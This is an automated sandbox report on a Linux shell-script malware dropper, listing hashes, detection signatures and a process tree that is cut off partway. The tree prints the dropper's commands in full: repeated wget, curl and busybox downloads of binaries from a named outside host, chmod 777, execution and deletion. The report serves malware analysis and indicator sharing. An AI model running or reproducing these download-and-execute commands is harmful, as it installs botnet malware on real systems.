Analysis
-
max time kernel
103s -
max time network
132s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
24/11/2024, 01:27
Static task
static1
Behavioral task
behavioral1
Sample
dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6.sh
-
Size
10KB
-
MD5
844b57641f1b3245860dd2c581f61721
-
SHA1
8e5b599c9c28222db2f5ebbb896754a6820dddec
-
SHA256
dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6
-
SHA512
b1afb1b8bf5e228f208109d75807797e71559784a2243e7b770551655332ee754ccb0dde3f95434e268884b7864fc7217199bf5b9194ad8c121f7acf60dceb06
-
SSDEEP
192:T7gcXS92oJyOGppODXRWm3Tf92oJyOAppODXT3TsZ:T7gcXS92oJyOdWqf92oJyO9sZ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 927 chmod 955 chmod 969 chmod 751 chmod 871 chmod 878 chmod 858 chmod 892 chmod 1011 chmod 763 chmod 906 chmod 934 chmod 920 chmod 948 chmod 789 chmod 990 chmod 1004 chmod 820 chmod 941 chmod 976 chmod 997 chmod 744 chmod 885 chmod 962 chmod 913 chmod 983 chmod 827 chmod 899 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 745 eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 /tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M 752 RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M /tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm 765 WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm /tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an 790 KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ 821 s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh 828 alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC 859 at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 872 lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q 879 YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB 886 AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a 893 fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ 900 K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo 907 WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R 914 DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ 921 s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh 928 alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC 935 at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 942 lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q 949 YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB 956 AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a 963 fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ 970 K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo 977 WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R 984 DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R /tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 991 eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 /tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M 998 RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M /tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm 1005 WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm /tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an 1012 KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 880 rm 909 wget 916 wget 830 wget 784 busybox 895 wget 910 curl 979 wget 1008 curl 1010 busybox 743 busybox 881 wget 912 busybox 917 curl 949 YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q 987 curl 1007 wget 759 busybox 754 wget 879 YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q 944 wget 980 curl 989 busybox 719 wget 819 busybox 823 wget 826 busybox 898 busybox 919 busybox 950 rm 958 wget 755 curl 994 curl 966 curl 870 busybox 877 busybox 973 curl 837 curl 923 wget 863 wget 882 curl 891 busybox 902 wget 933 busybox 996 busybox 1000 wget 868 curl 794 wget 889 curl 930 wget 945 curl 959 curl 965 wget 968 busybox 776 curl 875 curl 903 curl 940 busybox 961 busybox 986 wget 824 curl 750 busybox 874 wget 888 wget -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC curl File opened for modification /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q curl File opened for modification /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB curl File opened for modification /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R curl File opened for modification /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a curl File opened for modification /tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an curl File opened for modification /tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an curl File opened for modification /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh curl File opened for modification /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB curl File opened for modification /tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M curl File opened for modification /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ curl File opened for modification /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo curl File opened for modification /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo curl File opened for modification /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ curl File opened for modification /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q curl File opened for modification /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R curl File opened for modification /tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 curl File opened for modification /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 curl File opened for modification /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh curl File opened for modification /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 curl File opened for modification /tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 curl File opened for modification /tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M curl File opened for modification /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a curl File opened for modification /tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm curl File opened for modification /tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm curl File opened for modification /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ curl File opened for modification /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC curl File opened for modification /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ curl
Processes
-
/tmp/dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6.sh/tmp/dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6.sh1⤵PID:711
-
/bin/rm/bin/rm bins.sh2⤵PID:715
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵
- System Network Configuration Discovery
PID:719
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:738
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵
- System Network Configuration Discovery
PID:743
-
-
/bin/chmodchmod 777 eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵
- File and Directory Permissions Modification
PID:744
-
-
/tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5./eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵
- Executes dropped EXE
PID:745
-
-
/bin/rmrm eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵PID:746
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵PID:747
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:748
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵
- System Network Configuration Discovery
PID:750
-
-
/bin/chmodchmod 777 RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M./RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵
- Executes dropped EXE
PID:752
-
-
/bin/rmrm RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵PID:753
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵
- System Network Configuration Discovery
PID:754
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:755
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵
- System Network Configuration Discovery
PID:759
-
-
/bin/chmodchmod 777 WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm./WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵
- Executes dropped EXE
PID:765
-
-
/bin/rmrm WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵PID:768
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵PID:769
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:776
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵
- System Network Configuration Discovery
PID:784
-
-
/bin/chmodchmod 777 KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵
- File and Directory Permissions Modification
PID:789
-
-
/tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an./KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵
- Executes dropped EXE
PID:790
-
-
/bin/rmrm KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵PID:793
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵
- System Network Configuration Discovery
PID:794
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵
- System Network Configuration Discovery
PID:819
-
-
/bin/chmodchmod 777 s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ./s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵PID:822
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵
- System Network Configuration Discovery
PID:823
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:824
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵
- System Network Configuration Discovery
PID:826
-
-
/bin/chmodchmod 777 alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵
- File and Directory Permissions Modification
PID:827
-
-
/tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh./alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵
- Executes dropped EXE
PID:828
-
-
/bin/rmrm alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵PID:829
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵
- System Network Configuration Discovery
PID:830
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:837
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵PID:849
-
-
/bin/chmodchmod 777 at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵
- File and Directory Permissions Modification
PID:858
-
-
/tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC./at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵
- Executes dropped EXE
PID:859
-
-
/bin/rmrm at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵PID:862
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵
- System Network Configuration Discovery
PID:863
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:868
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵
- System Network Configuration Discovery
PID:870
-
-
/bin/chmodchmod 777 lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2./lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵PID:873
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- System Network Configuration Discovery
PID:874
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- System Network Configuration Discovery
PID:877
-
-
/bin/chmodchmod 777 YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q./YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:879
-
-
/bin/rmrm YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- System Network Configuration Discovery
PID:880
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵
- System Network Configuration Discovery
PID:881
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵PID:884
-
-
/bin/chmodchmod 777 AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB./AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵PID:887
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵
- System Network Configuration Discovery
PID:888
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵
- System Network Configuration Discovery
PID:891
-
-
/bin/chmodchmod 777 fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a./fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵PID:894
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵
- System Network Configuration Discovery
PID:895
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵
- System Network Configuration Discovery
PID:898
-
-
/bin/chmodchmod 777 K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ./K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵PID:901
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵
- System Network Configuration Discovery
PID:902
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵PID:905
-
-
/bin/chmodchmod 777 WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵
- File and Directory Permissions Modification
PID:906
-
-
/tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo./WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵
- Executes dropped EXE
PID:907
-
-
/bin/rmrm WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵PID:908
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵
- System Network Configuration Discovery
PID:909
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:910
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵
- System Network Configuration Discovery
PID:912
-
-
/bin/chmodchmod 777 DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R./DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵PID:915
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵
- System Network Configuration Discovery
PID:916
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵
- System Network Configuration Discovery
PID:919
-
-
/bin/chmodchmod 777 s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ./s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵PID:922
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵
- System Network Configuration Discovery
PID:923
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵PID:926
-
-
/bin/chmodchmod 777 alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh./alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵PID:929
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵
- System Network Configuration Discovery
PID:930
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵
- System Network Configuration Discovery
PID:933
-
-
/bin/chmodchmod 777 at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC./at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵PID:936
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵PID:937
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵
- System Network Configuration Discovery
PID:940
-
-
/bin/chmodchmod 777 lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2./lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵PID:943
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- System Network Configuration Discovery
PID:944
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- Reads runtime system information
- System Network Configuration Discovery
